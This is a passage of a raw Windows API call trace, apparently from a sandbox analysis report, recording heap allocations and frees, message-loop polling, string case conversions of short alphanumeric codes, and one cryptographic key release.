Size=0x10) returned 0x34aaa00 [0252.668] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0252.668] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0252.668] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0252.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0252.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0252.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0252.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0252.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0252.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0252.668] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0252.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0252.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0252.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0252.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0252.668] CryptDestroyKey (hKey=0xaa5660) returned 1 [0252.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0252.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0252.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0252.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0252.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0252.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0252.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0252.669] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0252.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0252.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0252.669] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0252.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0252.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0252.669] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0252.669] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0252.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0252.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0252.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0252.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0252.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0252.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0252.670] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0252.670] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0252.670] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0252.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0252.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0252.670] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0252.670] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0252.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0252.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0252.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0252.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0252.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0252.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0252.671] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0252.671] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0252.671] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0252.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0252.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0252.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0252.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0252.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0252.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0252.671] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0252.671] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0252.671] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0252.672] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0252.672] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0252.672] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0252.672] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0252.672] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0252.672] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0252.672] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0252.672] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0252.672] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.672] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0252.672] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.672] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0252.673] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.673] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.673] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0252.673] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0252.673] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0252.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0252.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0252.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0252.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0252.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0252.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0252.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0252.674] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0252.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0252.674] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0252.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0252.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0252.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0252.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0252.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0252.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0252.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0252.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0252.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0252.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0252.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0252.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0252.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0252.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0252.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0252.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0252.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0252.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0252.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0252.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0252.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0252.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0252.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0252.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0252.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0252.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0252.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0252.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0252.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0252.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0252.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0252.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0252.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0252.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0252.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0252.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0252.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0252.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0252.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0252.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0252.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0252.677] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0252.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0252.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0252.677] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.678] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0252.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0252.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0252.678] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0252.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0252.678] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0252.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0252.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0252.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0252.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0252.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0252.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0252.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0252.679] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0252.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0252.679] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0252.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0252.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0252.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0252.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0252.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0252.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0252.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0252.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0252.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0252.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0252.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0252.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0252.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0252.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0252.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0252.680] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.680] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0252.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0252.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0252.680] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0252.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0252.680] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0252.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0252.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0252.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0252.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0252.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0252.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0252.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0252.681] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0252.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0252.681] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0252.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0252.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0252.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0252.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0252.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0252.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0252.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0252.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0252.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0252.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0252.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0252.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0252.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0252.682] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0252.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0252.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0252.682] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0252.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0252.683] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0252.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0252.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0252.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0252.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0252.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0252.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0252.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0252.683] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0252.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0252.683] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, 